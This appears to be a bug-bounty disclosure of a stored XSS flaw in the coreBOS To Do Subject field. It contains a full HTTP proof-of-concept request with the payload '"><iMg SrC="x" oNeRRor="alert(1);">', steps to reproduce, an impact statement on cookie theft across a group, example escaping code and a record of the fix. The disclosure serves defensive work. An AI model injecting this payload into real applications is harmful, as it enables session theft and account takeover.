Cross-site Scripting (XSS) - Stored in tsolucio/corebos

Valid

Reported on

Sep 22nd 2021


Description

Stored XSS in the Subject field of To Dos

Proof of Concept

// PoC Request
POST /corebos/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------136503058339251009483555336795
Content-Length: 7141
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/corebos/index.php?module=cbCalendar&action=EditView&return_action=DetailView
Cookie: ck_login_id_vtiger=1; timezone=0; corebos_browsertabID=609786462376996; _orangehrm=929bfb55f5e0dde7a982136b062a17de; BOXSID=4ipvdaiqhuu670rjgo3bspnd4h; 127001corebos=r2lm7d6pp76a2s5jsikfuv39k5
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="__vt5rftk"

sid:3d0d662748c7e5561397afa2030143ed4c6533f8,1632324889
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="MAX_FILE_SIZE"

3000000
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="pagenumber"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="module"

cbCalendar
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="record"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="mode"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="action"

Save
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="saverepeat"

0
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="return_module"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="return_id"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="return_action"

DetailView
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="return_viewname"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="createmode"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="cbcustominfo1"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="cbcustominfo2"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="Module_Popup_Edit"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="Module_Popup_Save"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="Module_Popup_Save_Param"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="FILTERFIELDSMAP"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="search_url"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="subject"

"><iMg SrC="x" oNeRRor="alert(1);">
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="assigntype"

U
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="assigned_user_id"

1
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="assigned_group_id"

3
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="dtstart"

2021-09-22 03:34
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="timefmt_dtstart"

PM
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="dtend"

2021-09-22 04:34
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="timefmt_dtend"

PM
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="rel_id_type"

Accounts
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="rel_id"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="rel_id_display"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="cto_id_type"

Contacts
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="cto_id"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="cto_id_display"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="eventstatus"

Planned
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="taskpriority"

High
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="activitytype"

Call
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="visibility"

Private
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="location"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="relatedwith_type"

cbCalendar
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="relatedwith"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="relatedwith_display"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="description"

test
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="followupdt"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="timefmt_followupdt"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="followuptype"

Call
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="inviteesid"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="set_reminder"

No
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="remdays"

0
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="remhrs"

0
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="remmin"

10
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="repeat_frequency"

1
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="recurringtype"

Daily
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="calendar_repeat_limit_date"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="repeatMonth"

date
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="repeatMonth_date"


-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="repeatMonth_daytype"

first
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="repeatMonth_day"

1
-----------------------------136503058339251009483555336795--

Steps to reproduce

Go to My Home Page > To Dos > Create To Do

In the Subject input, enter the payload "><iMg SrC="x" oNeRRor="alert(1);">

The XSS triggers in the notification shown afterwards; it can take a few seconds to appear

Video PoC: PoC

Impact

This vulnerability can be used to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie. When the malicious To Do is assigned to a group, the payload executes for every user in that group, so the attacker obtains the cookies of all users in that group.
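The root cause of this class of bug is that the stored subject reaches the notification markup without HTML encoding. The block below is an added example, not coreBOS code: it shows an unencoded rendering next to a hardened one that encodes the field in both attribute and text context, plus a small audit helper for finding already-stored subjects that contain markup. The function names escapeHtml, renderNotificationUnsafe, renderNotificationSafe and looksLikeMarkup, and the todo.subject field, are assumptions for illustration; the only value taken from the report is the subject payload.

```javascript
// Added example (not coreBOS code): HTML-encoding a stored To Do subject
// before it is placed into notification markup, plus an audit helper.
// Function and field names are assumptions; the payload string is the one
// from the report.

// Minimal HTML entity encoder for text placed into element content or
// into double-quoted attribute values. '&' is replaced first so that the
// entities produced by later replacements are not re-encoded.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Unsafe rendering: the subject is concatenated raw into markup, which is
// the behaviour the report describes (the stored value runs in the
// notification).
function renderNotificationUnsafe(todo) {
  return '<div class="notify" title="' + todo.subject + '">' +
    todo.subject + '</div>';
}

// Hardened rendering: the untrusted field is encoded at the point of
// insertion, once for the attribute value and once for the text node.
function renderNotificationSafe(todo) {
  const subject = escapeHtml(todo.subject);
  return '<div class="notify" title="' + subject + '">' + subject + '</div>';
}

// Audit heuristic for records that were stored before a fix: flags subjects
// containing tag-like markup or an inline event-handler attribute so they
// can be reviewed. It is deliberately broad; review hits by hand.
function looksLikeMarkup(subject) {
  return /<\s*\/?[a-z]/i.test(subject) || /\bon[a-z]+\s*=/i.test(subject);
}

// Constructed sample record using the subject value from the report.
const SAMPLE_TODO = { subject: '"><iMg SrC="x" oNeRRor="alert(1);">' };

// Runs both renderers and the audit check over the sample record.
function demo() {
  return {
    unsafe: renderNotificationUnsafe(SAMPLE_TODO),
    safe: renderNotificationSafe(SAMPLE_TODO),
    flagged: looksLikeMarkup(SAMPLE_TODO.subject),
  };
}

console.log(demo());
```

The encoded output still displays the literal subject text to the user; it just can no longer close the title attribute or open a new element. The same encoding must be applied server-side wherever the field is emitted into HTML, not only in this one notification path.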

We have contacted a member of the tsolucio/corebos team and are waiting to hear back 2 months ago
Joe Bordes validated this vulnerability 2 months ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
Joe Bordes confirmed that a fix has been merged on 1b9c86 2 months ago
Joe Bordes has been awarded the fix bounty